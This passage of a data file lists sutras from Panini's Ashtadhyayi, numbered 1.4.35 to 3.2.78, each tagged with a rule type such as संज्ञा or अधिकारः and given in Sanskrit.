ज्ञीप्स्यमानः","1.4.35:संज्ञा:धारेरुत्तमर्णः","1.4.36:संज्ञा:स्पृहेरीप्सितः","1.4.37:संज्ञा:क्रुधद्रुहेर्ष्याऽसूयार्थानां यं प्रति कोपः","1.4.38:संज्ञा:क्रुधद्रुहोरुपसृष्टयोः कर्म","1.4.39:संज्ञा:राधीक्ष्योर्यस्य विप्रश्नः","1.4.40:संज्ञा:प्रत्याङ्भ्यां श्रुवः पूर्वस्य कर्ता","1.4.41:संज्ञा:अनुप्रतिगृणश्च","1.4.42:संज्ञा:साधकतमं करणम्","1.4.43:संज्ञा:दिवः कर्म च","1.4.44:संज्ञा:परिक्रयणे सम्प्रदानमन्यतरस्याम्","1.4.45:संज्ञा:आधारोऽधिकरणम्","1.4.46:संज्ञा:अधिशीङ्स्थाऽऽसां कर्म","1.4.47:संज्ञा:अभिनिविशश्च","1.4.48:संज्ञा:उपान्वध्याङ्वसः","1.4.49:संज्ञा:कर्तुरीप्सिततमं कर्म","1.4.50:संज्ञा:तथायुक्तं चानिप्सीतम्","1.4.51:संज्ञा:अकथितं च","1.4.52:संज्ञा:गतिबुद्धिप्रत्यवसानार्थशब्दकर्माकर्मकाणामणि कर्ता","1.4.53:संज्ञा:हृक्रोरन्यतरस्याम्","1.4.54:संज्ञा:स्वतन्त्रः कर्ता","1.4.55:संज्ञा:तत्प्रयोजको हेतुश्च","1.4.56:अधिकारः:प्राग्रीश्वरान्निपाताः","1.4.57::चादयोऽसत्त्वे","1.4.58::प्रादयः","1.4.59:संज्ञा:उपसर्गाः क्रियायोगे","1.4.60:संज्ञा:गतिश्च","1.4.61:संज्ञा:ऊर्यादिच्विडाचश्च","1.4.62:संज्ञा:अनुकरणं चानितिपरम्","1.4.63:संज्ञा:आदरानादरयोः सदसती","1.4.64:संज्ञा:भूषणेऽलम्","1.4.65:संज्ञा:अन्तरपरिग्रहे","1.4.66:संज्ञा:कणेमनसी श्रद्धाप्रतीघाते","1.4.67:संज्ञा:पुरोऽव्ययम्","1.4.68:संज्ञा:अस्तं च","1.4.69:संज्ञा:अच्छ गत्यर्थवदेषु","1.4.70:संज्ञा:अदोऽनुपदेशे","1.4.71:संज्ञा:तिरोऽन्तर्द्धौ","1.4.72:संज्ञा:विभाषा कृञि","1.4.73:संज्ञा:उपाजेऽन्वाजे","1.4.74:संज्ञा:साक्षात्प्रभृतीनि 
च","1.4.75:संज्ञा:अनत्याधान उरसिमनसी","1.4.76:संज्ञा:मध्येपदेनिवचने च","1.4.77:संज्ञा:नित्यं हस्ते पाणावुपयमने","1.4.78:संज्ञा:प्राध्वं बन्धने","1.4.79:संज्ञा:जीविकोपनिषदावौपम्ये","1.4.80::ते प्राग्धातोः","1.4.81::छन्दसि परेऽपि","1.4.82::व्यवहिताश्च","1.4.83:संज्ञा; अधिकारः:कर्मप्रवचनीयाः","1.4.84:संज्ञा:अनुर्लक्षणे","1.4.85:संज्ञा:तृतीयाऽर्थे","1.4.86:संज्ञा:हीने","1.4.87:संज्ञा:उपोऽधिके च","1.4.88:संज्ञा:अपपरी वर्जने","1.4.89:संज्ञा:आङ् मर्यादावचने","1.4.90:संज्ञा:लक्षणेत्थम्भूताख्यानभागवीप्सासु प्रतिपर्यनवः","1.4.91:संज्ञा:अभिरभागे","1.4.92:संज्ञा:प्रतिः प्रतिनिधिप्रतिदानयोः","1.4.93:संज्ञा:अधिपरी अनर्थकौ","1.4.94:संज्ञा:सुः पूजायाम्","1.4.95:संज्ञा:अतिरतिक्रमणे च","1.4.96:संज्ञा:अपिः पदार्थसम्भावनान्ववसर्गगर्हासमुच्चयेषु","1.4.97:संज्ञा:अधिरीश्वरे","1.4.98:संज्ञा:विभाषा कृञि","1.4.99:संज्ञा:लः परस्मैपदम्","1.4.100:संज्ञा:तङानावात्मनेपदम्","1.4.101:संज्ञा:तिङस्त्रीणि त्रीणि प्रथममध्यमोत्तमाः","1.4.102:संज्ञा:तान्येकवचनद्विवचनबहुवचनान्येकशः","1.4.103:संज्ञा:सुपः","1.4.104:संज्ञा:विभक्तिश्च","1.4.105::युष्मद्युपपदे समानाधिकरणे स्थानिन्यपि मध्यमः","1.4.106::प्रहासे च मन्योपपदे मन्यतेरुत्तम एकवच्च","1.4.107::अस्मद्युत्तमः","1.4.108::शेषे प्रथमः","1.4.109:संज्ञा:परः संनिकर्षः संहिता","1.4.110:संज्ञा:विरामोऽवसानम्","2.1.1:परिभाषा:समर्थः पदविधिः","2.1.2:अतिदेशः:सुबामन्त्रिते पराङ्गवत् स्वरे","2.1.3:संज्ञा; अधिकारः:प्राक् कडारात् समासः","2.1.4::सह सुपा","2.1.5:संज्ञा; अधिकारः:अव्ययीभावः","2.1.6::अव्ययं विभक्तिसमीपसमृद्धिव्यृद्ध्यर्थाभावात्ययासम्प्रतिशब्दप्रादुर्भावपश्चाद्यथाऽऽनुपूर्व्ययौगपद्यसादृश्यसम्पत्तिसाकल्यान्तवचनेषु","2.1.7::यथाऽसादृये","2.1.8::यावदवधारणे","2.1.9::सुप्प्रतिना मात्राऽर्थे","2.1.10::अक्षशलाकासंख्याः परिणा","2.1.11::विभाषा","2.1.12::अपपरिबहिरञ्चवः पञ्चम्या","2.1.13::आङ् मर्यादाऽभिविध्योः","2.1.14::लक्षणेनाभिप्रती आभिमुख्ये","2.1.15::अनुर्यत्समया","2.1.16::यस्य चायामः","2.1.17::तिष्ठद्गुप्रभृतीनि च","2.1.18::पारे मध्ये षष्ठ्या वा","2.1.19::संख्या वंश्येन","2.1.20::नदीभिश्च","2.1.21::अन्यपदार्थे च संज्ञायाम्","2.1.22:संज्ञा; अधिकारः:तत्पुरुषः","2.1.23:संज्ञा:द्विगुश्च","2.1.24::द्वितीया श्रितातीतपतितगतात्यस्तप्राप्तापन्नैः","2.1.25::स्वयं क्तेन","2.1.26::खट्वा क्षेपे","2.1.27::सामि","2.1.28::कालाः","2.1.29::अत्यन्तसंयोगे च","2.1.30::तृतीया तत्कृतार्थेन गुणवचनेन","2.1.31::पूर्वसदृशसमोनार्थकलहनिपुणमिश्रश्लक्ष्णैः","2.1.32::कर्तृकरणे कृता बहुलम्","2.1.33::कृत्यैरधिकार्थवचने","2.1.34::अन्नेन व्यञ्जनम्","2.1.35::भक्ष्येण मिश्रीकरणम्","2.1.36::चतुर्थी तदर्थार्थबलिहितसुखरक्षितैः","2.1.37::पञ्चमी भयेन","2.1.38::अपेतापोढमुक्तपतितापत्रस्तैरल्पशः","2.1.39::स्तोकान्तिकदूरार्थकृच्छ्राणि क्तेन","2.1.40::सप्तमी शौण्डैः","2.1.41::सिद्धशुष्कपक्वबन्धैश्च","2.1.42::ध्वाङ्क्षेण क्षेपे","2.1.43::कृत्यैर्ऋणे","2.1.44::संज्ञायाम्","2.1.45::क्तेनाहोरात्रावयवाः","2.1.46::तत्र","2.1.47::क्षेपे","2.1.48::पात्रेसमितादयश्च","2.1.49::पूर्वकालैकसर्वजरत्पुराणनवकेवलाः समानाधिकरणेन","2.1.50::दिक्संख्ये संज्ञायाम्","2.1.51::तद्धितार्थोत्तरपदसमाहारे च","2.1.52::संख्यापूर्वो द्विगुः","2.1.53::कुत्सितानि कुत्सनैः","2.1.54::पापाणके कुत्सितैः","2.1.55::उपमानानि सामान्यवचनैः","2.1.56::उपमितं व्याघ्रादिभिः सामान्याप्रयोगे","2.1.57::विशेषणं विशेष्येण बहुलम्","2.1.58::पूर्वापरप्रथमचरमजघन्यसमानमध्यमध्यमवीराश्च","2.1.59::श्रेण्यादयः कृतादिभिः","2.1.60::क्तेन नञ्विशिष्टेनानञ्","2.1.61::सन्महत्परमोत्तमोत्कृष्टाः पूज्यमानैः","2.1.62::वृन्दारकनागकुञ्जरैः पूज्यमानम्","2.1.63::कतरकतमौ जातिपरिप्रश्ने","2.1.64::किं क्षेपे","2.1.65::पोटायुवतिस्तोककतिपयगृष्टिधेनुवशावेहत्बष्कयणीप्रवक्तॄश्रोत्रियाध्यापकधूर्तैर्जातिः","2.1.66::प्रशंसावचनैश्च","2.1.67::युवा खलतिपलितवलिनजरतीभिः","2.1.68::कृत्यतुल्याख्या अजात्या","2.1.69::वर्णो 
वर्णेन","2.1.70::कुमारः श्रमणाऽऽदिभिः","2.1.71::चतुष्पादो गर्भिण्या","2.1.72::मयूरव्यंसकादयश्च","2.2.1::पूर्वापराधरोत्तरमेकदेशिनैकाधिकरणे","2.2.2::अर्धं नपुंसकम्","2.2.3::द्वितीयतृतीयचतुर्थतुर्याण्यन्यतरस्याम्","2.2.4::प्राप्तापन्ने च द्वितीयया","2.2.5::कालाः परिमाणिना","2.2.6::नञ्","2.2.7::ईषदकृता","2.2.8::षष्ठी","2.2.9::याजकादिभिश्च","2.2.10::न निर्धारणे","2.2.11::पूरणगुणसुहितार्थसदव्ययतव्यसमानाधिकरणेन","2.2.12::क्तेन च पूजायाम्","2.2.13::अधिकरणवाचिना च","2.2.14::कर्म्मणि च","2.2.15::तृजकाभ्यां कर्तरि","2.2.16::कर्त्तरि च","2.2.17::नित्यं क्रीडाजीविकयोः","2.2.18::कुगतिप्रादयः","2.2.19::उपपदमतिङ्","2.2.20::अमैवाव्ययेन","2.2.21::तृतीयाप्रभृतीन्यन्यतरस्याम्","2.2.22::क्त्वा च","2.2.23:संज्ञा:शेषो बहुव्रीहिः","2.2.24::अनेकमन्यपदार्थे","2.2.25::संख्ययाऽव्ययासन्नादूराधिकसंख्याः संख्येये","2.2.26::दिङ्नामान्यन्तराले","2.2.27::तत्र तेनेदमिति सरूपे","2.2.28::तेन सहेति तुल्ययोगे","2.2.29:संज्ञा:चार्थे द्वंद्वः","2.2.30::उपसर्जनं पूर्वम्","2.2.31::राजदन्तादिषु परम्","2.2.32::द्वंद्वे घि","2.2.33::अजाद्यदन्तम्","2.2.34::अल्पाच्तरम्","2.2.35::सप्तमीविशेषणे बहुव्रीहौ","2.2.36::निष्ठा","2.2.37::वाऽऽहिताग्न्यादिषु","2.2.38::कडाराः कर्मधराये","2.3.1:अधिकारः:अनभिहिते","2.3.2::कर्मणि द्वितीया","2.3.3::तृतीया च होश्छन्दसि","2.3.4::अन्तराऽन्तरेण युक्ते","2.3.5::कालाध्वनोरत्यन्तसंयोगे","2.3.6::अपवर्गे तृतीया","2.3.7::सप्तमीपञ्चम्यौ कारकमध्ये","2.3.8::कर्मप्रवचनीययुक्ते द्वितीया","2.3.9::यस्मादधिकं यस्य चेश्वरवचनं तत्र सप्तमी","2.3.10::पञ्चमी अपाङ्परिभिः","2.3.11::प्रतिनिधिप्रतिदाने च यस्मात्","2.3.12::गत्यर्थकर्मणि द्वितीयाचतुर्थ्यौ चेष्टायामनध्वनि","2.3.13::चतुर्थी सम्प्रदाने","2.3.14::क्रियार्थोपपदस्य च कर्मणि स्थानिनः","2.3.15::तुमर्थाच्च भाववचनात्","2.3.16::नमःस्वस्तिस्वाहास्वधालंवषड्योगाच्च","2.3.17::मन्यकर्मण्यनादरे विभाषाऽप्राणिषु","2.3.18::कर्तृकरणयोस्तृतीया","2.3.19::सहयुक्तेऽप्रधाने","2.3.20::येनाङ्गविकारः","2.3.21::इत्थंभूतलक्षणे","2.3.22::संज्ञोऽन्यतरस्यां कर्मणि","2.3.23::हेतौ","2.3.24::अकर्तर्यृणे पञ्चमी","2.3.25::विभाषा गुणेऽस्त्रियाम्","2.3.26::षष्ठी हेतुप्रयोगे","2.3.27::सर्वनाम्नस्तृतीया च","2.3.28::अपादाने पञ्चमी","2.3.29::अन्यारादितरर्त्तेदिक्शब्दाञ्चूत्तरपदाजाहियुक्ते","2.3.30::षष्ठ्यतसर्थप्रत्ययेन","2.3.31::एनपा द्वितीया","2.3.32::पृथग्विनानानाभिस्तृतीयाऽन्यतरस्याम्","2.3.33::करणे च स्तोकाल्पकृच्छ्रकतिपयस्यासत्त्ववचनस्य","2.3.34::दूरान्तिकार्थैः षष्ठ्यन्यतरस्याम्","2.3.35::दूरान्तिकार्थेभ्यो द्वितीया च","2.3.36::सप्तम्यधिकरणे च","2.3.37::यस्य च भावेन भावलक्षणम्","2.3.38::षष्ठी चानादरे","2.3.39::स्वामीश्वराधिपतिदायादसाक्षिप्रतिभूप्रसूतैश्च","2.3.40::आयुक्तकुशलाभ्यां चासेवायाम्","2.3.41::यतश्च निर्धारणम्","2.3.42::पञ्चमी विभक्ते","2.3.43::साधुनिपुणाभ्याम् अर्चायां सप्तम्यप्रतेः","2.3.44::प्रसितोत्सुकाभ्यां तृतीया च","2.3.45::नक्षत्रे च लुपि","2.3.46::प्रातिपदिकार्थलिङ्गपरिमाणवचनमात्रे प्रथमा","2.3.47::सम्बोधने च","2.3.48:संज्ञा:साऽऽमन्त्रितम्","2.3.49:संज्ञा:एकवचनं संबुद्धिः","2.3.50::षष्ठी शेषे","2.3.51::ज्ञोऽविदर्थस्य करणे","2.3.52::अधीगर्थदयेशां कर्मणि","2.3.53::कृञः प्रतियत्ने","2.3.54::रुजार्थानां भाववचनानामज्वरेः","2.3.55::आशिषि नाथः","2.3.56::जासिनिप्रहणनाटक्राथपिषां हिंसायाम्","2.3.57::व्यवहृपणोः समर्थयोः","2.3.58::दिवस्तदर्थस्य","2.3.59::विभाषोपसर्गे","2.3.60::द्वितीया ब्राह्मणे","2.3.61::प्रेष्यब्रुवोर्हविषो देवतासम्प्रदाने","2.3.62::चतुर्थ्यर्थे बहुलं छन्दसि","2.3.63::यजेश्च करणे","2.3.64::कृत्वोऽर्थप्रयोगे कालेऽधिकरणे","2.3.65::कर्तृकर्मणोः कृति","2.3.66::उभयप्राप्तौ कर्मणि","2.3.67::क्तस्य च वर्तमाने","2.3.68::अधिकरणवाचिनश्च","2.3.69::न लोकाव्ययनिष्ठाखलर्थतृनाम्","2.3.70::अकेनोर्भविष्यदाधमर्ण्ययोः","2.3.71::कृत्यानां कर्तरि वा","2.3.72::तुल्यार्थैरतुलोपमाभ्यां 
तृतीयाऽन्यतरस्याम्","2.3.73::चतुर्थी चाशिष्यायुष्यमद्रभद्रकुशलसुखार्थहितैः","2.4.1:अतिदेशः:द्विगुरेकवचनम्","2.4.2::द्वंद्वश्च प्राणितूर्यसेनाङ्गानाम्","2.4.3::अनुवादे चरणानाम्","2.4.4::अध्वर्युक्रतुरनपुंसकम्.","2.4.5::अध्ययनतोऽविप्रकृष्टाख्यानाम्","2.4.6::जातिरप्राणिनाम्","2.4.7::विशिष्टलिङ्गो नदी देशोऽग्रामाः","2.4.8::क्षुद्रजन्तवः","2.4.9::येषां च विरोधः शाश्वतिकः","2.4.10::शूद्राणामनिरवसितानाम्","2.4.11::गवाश्वप्रभृतीनि च","2.4.12::विभाषा वृक्षमृगतृणधान्यव्यञ्जनपशुशकुन्यश्ववडवपूर्वापराधरोत्तराणाम्","2.4.13::विप्रतिषिद्धं चानधिकरणवाचि","2.4.14::न दधिपयआदीनि","2.4.15::अधिकरणैतावत्त्वे च","2.4.16::विभाषा समीपे","2.4.17::स नपुंसकम्","2.4.18::अव्ययीभावश्च","2.4.19:अधिकारः:तत्पुरुषोऽनञ् कर्मधारयः","2.4.20::संज्ञायां कन्थोशीनरेषु","2.4.21::उपज्ञोपक्रमं तदाद्याचिख्यासायाम्","2.4.22::छाया बाहुल्ये","2.4.23::सभा राजाऽमनुष्यपूर्वा","2.4.24::अशाला च","2.4.25::विभाषा सेनासुराछायाशालानिशानाम्","2.4.26:अतिदेशः:परवल्लिङ्गं द्वन्द्वतत्पुरुषयोः","2.4.27::पूर्ववदश्ववडवौ","2.4.28::हेमन्तशिशिरावहोरात्रे च च्छन्दसि","2.4.29::रात्राह्नाहाः पुंसि","2.4.30::अपथं नपुंसकम्","2.4.31::अर्धर्चाः पुंसि च","2.4.32::इदमोऽन्वादेशेऽशनुदात्तस्तृतीयाऽऽदौ","2.4.33::एतदस्त्रतसोस्त्रतसौ चानुदात्तौ","2.4.34::द्वितीयाटौस्स्वेनः","2.4.35:अधिकारः:आर्द्धधातुके","2.4.36::अदो जग्धिर्ल्यप्ति किति","2.4.37::लुङ्सनोर्घसॢ","2.4.38::घञपोश्च","2.4.39::बहुलं छन्दसि","2.4.40::लिट्यन्यतरस्याम्","2.4.41::वेञो वयिः","2.4.42::हनो वध लिङि","2.4.43::लुङि च","2.4.44::आत्मनेपदेष्वन्यतरस्याम्","2.4.45::इणो गा लुङि","2.4.46::णौ गमिरबोधने","2.4.47::सनि च","2.4.48::इङश्च","2.4.49::गाङ् लिटि","2.4.50::विभाषा लुङ्लृङोः","2.4.51::णौ च सँश्चङोः","2.4.52::अस्तेर्भूः","2.4.53::ब्रुवो वचिः","2.4.54::चक्षिङः ख्याञ्","2.4.55::वा लिटि","2.4.56::अजेर्व्यघञपोः","2.4.57::वा यौ","2.4.58::ण्यक्षत्रियार्षञितो यूनि लुगणिञोः","2.4.59::पैलादिभ्यश्च","2.4.60::इञः प्राचाम्","2.4.61::न तौल्वलिभ्यः","2.4.62::तद्राजस्य बहुषु तेनैवास्त्रियाम्","2.4.63::यस्कादिभ्यो गोत्रे","2.4.64::यञञोश्च","2.4.65::अत्रिभृगुकुत्सवसिष्ठगोतमाङ्गिरोभ्यश्च","2.4.66::बह्वचः इञः प्राच्यभरतेषु","2.4.67::न गोपवनादिभ्यः","2.4.68::तिककितवादिभ्यो द्वंद्वे","2.4.69::उपकादिभ्योऽन्यतरस्यामद्वंद्वे","2.4.70::आगस्त्यकौण्डिन्ययोरगस्तिकुण्डिनच्","2.4.71::सुपो धातुप्रातिपदिकयोः","2.4.72::अदिप्रभृतिभ्यः शपः","2.4.73::बहुलं छन्दसि","2.4.74::यङोऽचि च","2.4.75::जुहोत्यादिभ्यः श्लुः","2.4.76::बहुलं छन्दसि","2.4.77::गातिस्थाघुपाभूभ्यः सिचः परस्मैपदेषु","2.4.78::विभाषा घ्राधेट्शाच्छासः","2.4.79::तनादिभ्यस्तथासोः","2.4.80::मन्त्रे घसह्वरणशवृदहाद्वृच्कृगमिजनिभ्यो लेः","2.4.81::आमः","2.4.82::अव्ययादाप्सुपः","2.4.83::नाव्ययीभावादतोऽम्त्वपञ्चम्याः","2.4.84::तृतीयासप्तम्योर्बहुलम्","2.4.85::लुटः प्रथमस्य डारौरसः","3.1.1:संज्ञा; अधिकारः:प्रत्ययः","3.1.2:अधिकारः:परश्च","3.1.3::आद्युदात्तश्च","3.1.4::अनुदत्तौ सुप्पितौ","3.1.5::गुप्तिज्किद्भ्यः सन्","3.1.6::मान्बधदान्शान्भ्यो दीर्घश्चाभ्यासस्य","3.1.7::धातोः कर्मणः समानकर्तृकादिच्छायां वा","3.1.8::सुप आत्मनः क्यच्","3.1.9::काम्यच्च","3.1.10::उपमानादाचारे","3.1.11::कर्तुः क्यङ् सलोपश्च","3.1.12::भृशादिभ्यो भुव्यच्वेर्लोपश्च हलः","3.1.13::लोहितादिडाज्भ्यः क्यष्।","3.1.14::कष्टाय क्रमणे","3.1.15::कर्मणः रोमन्थतपोभ्यां वर्तिचरोः","3.1.16::बाष्पोष्माभ्यां उद्वमने","3.1.17::शब्दवैरकलहाभ्रकण्वमेघेभ्यः करणे","3.1.18::सुखादिभ्यः कर्तृवेदनायाम्","3.1.19::नमोवरिवश्चित्रङः क्यच्","3.1.20::पुच्छभाण्डचीवराण्णिङ्","3.1.21::मुण्डमिश्रश्लक्ष्णलवणव्रतवस्त्रहलकलकृततूस्तेभ्यो","3.1.22:अधिकारः:धातोरेकाचो हलादेः क्रियासमभिहारे यङ्","3.1.23::नित्यं कौटिल्ये गतौ","3.1.24::लुपसदचरजपजभदहदशगॄभ्यो भावगर्हायाम्","3.1.25::सत्यापपाशरूपवीणातूलश्लोकसेनालोमत्वचवर्मवर्णचूर्णचुरादिभ्यो णिच्","3.1.26::हेतुमति 
च","3.1.27::कण्ड्वादिभ्यो यक्","3.1.28::गुपूधूपविच्छिपणिपनिभ्य आयः","3.1.29::ऋतेरीयङ्","3.1.30::कमेर्णिङ्","3.1.31::आयादय आर्धद्धातुके वा","3.1.32:संज्ञा:सनाद्यन्ता धातवः","3.1.33::स्यतासी लृलुटोः","3.1.34::सिब्बहुलं लेटि","3.1.35::कास्प्रत्ययादाममन्त्रे लिटि","3.1.36::इजादेश्च गुरुमतोऽनृच्छः","3.1.37::दयायासश्च","3.1.38::उषविदजागृभ्योऽन्यतरस्याम्","3.1.39::भीह्रीभृहुवां श्लुवच्च","3.1.40::कृञ् चानुप्रयुज्यते लिटि","3.1.41::विदाङ्कुर्वन्त्वित्यन्यतरस्याम्","3.1.42::अभ्युत्सादयांप्रजनयांचिकयांरमयामकः","3.1.43::च्लि लुङि","3.1.44::च्लेः सिच्","3.1.45::शल इगुपधादनिटः क्सः","3.1.46::श्लिष आलिङ्गने","3.1.47::न दृशः","3.1.48::णिश्रिद्रुस्रुभ्यः कर्तरि चङ्","3.1.49::विभाषा धेट्श्व्योः","3.1.50::गुपेश्छन्दसि","3.1.51::नोनयतिध्वनयत्येलयत्यर्दयतिभ्यः","3.1.52::अस्यतिवक्तिख्यातिभ्यः अङ्","3.1.53::लिपिसिचिह्वश्च","3.1.54::आत्मनेपदेष्वन्यतरस्याम्","3.1.55::पुषादिद्युताद्यॢदितः परस्मैपदेषु","3.1.56::सर्त्तिशास्त्यर्तिभ्यश्च","3.1.57::इरितो वा","3.1.58::जृस्तम्भुम्रुचुम्लुचुग्रुचुग्लुचुग्लुञ्चुश्विभ्यश्च","3.1.59::कृमृदृरुहिभ्यश्छन्दसि","3.1.60::चिण् ते पदः","3.1.61::दीपजनबुधपूरितायिप्यायिभ्योऽन्यतरस्याम्","3.1.62::अचः कर्मकर्तरि","3.1.63::दुहश्च","3.1.64::न रुधः","3.1.65::तपोऽनुतापे च","3.1.66::चिण् भावकर्मणोः","3.1.67::सार्वधातुके यक्","3.1.68::कर्तरि शप्","3.1.69::दिवादिभ्यः श्यन्","3.1.70::वा भ्राशभ्लाशभ्रमुक्रमुक्लमुत्रसित्रुटिलषः","3.1.71::यसोऽनुपसर्गात्","3.1.72::संयसश्च","3.1.73::स्वादिभ्यः श्नुः","3.1.74::श्रुवः शृ च","3.1.75::अक्षोऽन्यतरस्याम्","3.1.76::तनूकरणे तक्षः","3.1.77::तुदादिभ्यः शः","3.1.78::रुधादिभ्यः श्नम्","3.1.79::तनादिकृञ्भ्य उः","3.1.80::धिन्विकृण्व्योर च","3.1.81::क्र्यादिभ्यः श्ना","3.1.82::स्तम्भुस्तुम्भुस्कम्भुस्कुम्भुस्कुञ्भ्यः श्नुश्च","3.1.83::हलः श्नः शानज्झौ","3.1.84::छन्दसि शायजपि","3.1.85::व्यत्ययो बहुलम्","3.1.86::लिङ्याशिष्यङ्","3.1.87:अतिदेशः:कर्मवत् कर्मणा तुल्यक्रियः","3.1.88::तपस्तपःकर्मकस्यैव","3.1.89::न दुहस्नुनमां यक्चिणौ","3.1.90::कुषिरजोः प्राचां श्यन् परस्मैपदं च","3.1.91:अधिकारः:धातोः","3.1.92:संज्ञा:तत्रोपपदं सप्तमीस्थम्","3.1.93:संज्ञा:कृदतिङ्","3.1.94:परिभाषा:वाऽसरूपोऽस्त्रियाम्","3.1.95:संज्ञा:कृत्याः प्राङ् ण्वुलः","3.1.96::तव्यत्तव्यानीयरः","3.1.97::अचो यत्","3.1.98::पोरदुपधात्","3.1.99::शकिसहोश्च","3.1.100::गदमदचरयमश्चानुपसर्गे","3.1.101::अवद्यपण्यवर्या गर्ह्यपणितव्यानिरोधेषु","3.1.102::वह्यं करणम्","3.1.103::अर्यः स्वामिवैश्ययोः","3.1.104::उपसर्या काल्या प्रजने","3.1.105::अजर्यं संगतम्","3.1.106::वदः सुपि क्यप् च","3.1.107::भुवो भावे","3.1.108::हनस्त च","3.1.109::एतिस्तुशस्वृदृजुषः क्यप्","3.1.110::ऋदुपधाच्चाकॢपिचृतेः","3.1.111::ई च खनः","3.1.112::भृञोऽसंज्ञायाम्","3.1.113::मृजेर्विभाषा","3.1.114::राजसूयसूर्यमृषोद्यरुच्यकुप्यकृष्टपच्याव्यथ्याः","3.1.115::भिद्योद्ध्यौ नदे","3.1.116::पुष्यसिद्ध्यौ नक्षत्रे","3.1.117::विपूयविनीयजित्या मुञ्जकल्कहलिषु","3.1.118::प्रत्यपिभ्यां ग्रहेश्छन्दसि","3.1.119::पदास्वैरिबाह्यापक्ष्येषु च","3.1.120::विभाषा कृवृषोः","3.1.121::युग्यं च पत्त्रे","3.1.122::अमावस्यदन्यतरस्याम्","3.1.123::छन्दसि निष्टर्क्यदेवहूयप्रणीयोन्नीयोच्छिष्य","3.1.124::ऋहलोर्ण्यत्","3.1.125::ओरावश्यके","3.1.126::आसुयुवपिरपिलपित्रपिचमश्च","3.1.127::आनाय्योऽनित्ये","3.1.128::प्रणाय्योऽसंमतौ","3.1.129::पाय्यसान्नाय्यनिकाय्यधाय्या मानहविर्निवाससामिधेनीषु","3.1.130::क्रतौ कुण्डपाय्यसंचाय्यौ","3.1.131::अग्नौ परिचाय्योपचाय्यसमूह्याः","3.1.132::चित्याग्निचित्ये च","3.1.133::ण्वुल्तृचौ","3.1.134::नन्दिग्रहिपचादिभ्यो ल्युणिन्यचः","3.1.135::इगुपधज्ञाप्रीकिरः कः","3.1.136::आतश्चोपसर्गे","3.1.137::पाघ्राध्माधेट्दृशः शः","3.1.138::अनुपसर्गाल्लिम्पविन्दधारिपारिवेद्युदेजिचेतिसातिसाहिभ्यश्च","3.1.139::ददातिदधात्योर्विभाषा","3.1.140::ज्वलितिकसन्तेभ्यो 
णः","3.1.141::श्याऽऽद्व्यधास्रुसंस्र्वतीणवसाऽवहृलिहश्लिषश्वसश्च","3.1.142::दुन्योरनुपसर्गे","3.1.143::विभाषा ग्रहेः","3.1.144::गेहे कः","3.1.145::शिल्पिनि ष्वुन्","3.1.146::गस्थकन्","3.1.147::ण्युट् च","3.1.148::हश्च व्रीहिकालयोः","3.1.149::प्रुसृल्वः समभिहारे वुन्","3.1.150::आशिषि च","3.2.1::कर्मण्यण्","3.2.2::ह्वावामश्च","3.2.3::आतोऽनुपसर्गे कः","3.2.4::सुपि स्थः","3.2.5::तुन्दशोकयोः परिमृजापनुदोः","3.2.6::प्रे दाज्ञः","3.2.7::समि ख्यः","3.2.8::गापोष्टक्","3.2.9::हरतेरनुद्यमनेऽच्","3.2.10::वयसि च","3.2.11::आङि ताच्छील्ये","3.2.12::अर्हः","3.2.13::स्तम्बकर्णयोः रमिजपोः","3.2.14::शमि धातोः संज्ञायाम्","3.2.15::अधिकरणे शेतेः","3.2.16::चरेष्टः","3.2.17::भिक्षासेनाऽऽदायेषु च","3.2.18::पुरोऽग्रतोऽग्रेषु सर्तेः","3.2.19::पूर्वे कर्तरि","3.2.20::कृञो हेतुताच्छील्यानुलोम्येषु","3.2.21::दिवाविभानिशाप्रभाभास्करान्तानन्तादिबहुनान्दीकिम्लिपिलिबिबलिभक्तिकर्तृचित्रक्षेत्रसंख्याजङ्घाबाह्वहर्यत्तत्धनुररुष्षु","3.2.22::कर्मणि भृतौ","3.2.23::न शब्दश्लोककलहगाथावैरचाटुसूत्रमन्त्रपदेषु","3.2.24::स्तम्बशकृतोरिन्","3.2.25::हरतेर्दृतिनाथयोः पशौ","3.2.26::फलेग्रहिरात्मम्भरिश्च","3.2.27::छन्दसि वनसनरक्षिमथाम्","3.2.28::एजेः खश्","3.2.29::नासिकास्तनयोर्ध्माधेटोः","3.2.30::नाडीमुष्ट्योश्च","3.2.31::उदि कूले रुजिवहोः","3.2.32::वहाभ्रे लिहः","3.2.33::परिमाणे पचः","3.2.34::मितनखे च","3.2.35::विध्वरुषोः तुदः","3.2.36::असूर्यललाटयोर्दृशितपोः","3.2.37::उग्रम्पश्येरम्मदपाणिन्धमाश्च","3.2.38::प्रियवशे वदः खच्","3.2.39::द्विषत्परयोस्तापेः","3.2.40::वाचि यमो व्रते","3.2.41::पूःसर्वयोर्दारिसहोः","3.2.42::सर्वकूलाभ्रकरीषेषु कषः","3.2.43::मेघर्तिभयेषु कृञः","3.2.44::क्षेमप्रियमद्रेऽण् च","3.2.45::आशिते भुवः करणभावयोः","3.2.46::संज्ञायां भृतॄवृजिधारिसहितपिदमः","3.2.47::गमश्च","3.2.48::अन्तात्यन्ताध्वदूरपारसर्वानन्तेषु डः","3.2.49::आशिषि हनः","3.2.50::अपे क्लेशतमसोः","3.2.51::कुमारशीर्षयोर्णिनिः","3.2.52::लक्षणे जायापत्योष्टक्","3.2.53::अमनुष्यकर्तृके च","3.2.54::शक्तौ हस्तिकपाटयोः","3.2.55::पाणिघताडघौ शिल्पिनि","3.2.56::आढ्यसुभगस्थूलपलितनग्नान्धप्रियेषु च्व्य्र्थेष्वच्वौ कृञः करणे ख्युन्","3.2.57::कर्तरि भुवः खिष्णुच्खुकञौ","3.2.58::स्पृशोऽनुदके क्विन्","3.2.59::ऋत्विग्दधृक्स्रग्दिगुष्णिगञ्चुयुजिक्रुञ्चां च","3.2.60::त्यदादिषु दृशोऽनालोचने कञ् च","3.2.61::सत्सूद्विषद्रुहदुहयुजविदभिदच्छिदजिनीराजामुपसर्गेऽपि क्विप्","3.2.62::भजो ण्विः","3.2.63::छन्दसि सहः","3.2.64::वहश्च","3.2.65::कव्यपुरीषपुरीष्येषु ञ्युट्","3.2.66::हव्येऽनन्तः पादम्","3.2.67::जनसनखनक्रमगमो विट्","3.2.68::अदोऽनन्ने","3.2.69::क्रव्ये च","3.2.70::दुहः कब् घश्च","3.2.71::मन्त्रे श्वेतवहौक्थशस्पुरोडाशो ण्विन्","3.2.72::अवे यजः","3.2.73::विजुपे छन्दसि","3.2.74::आतो मनिन्क्वनिप्वनिपश्च","3.2.75::अन्येभ्योऽपि दृश्यन्ते","3.2.76::क्विप् च","3.2.77::स्थः क च","3.2.78::सुप्यजातौ 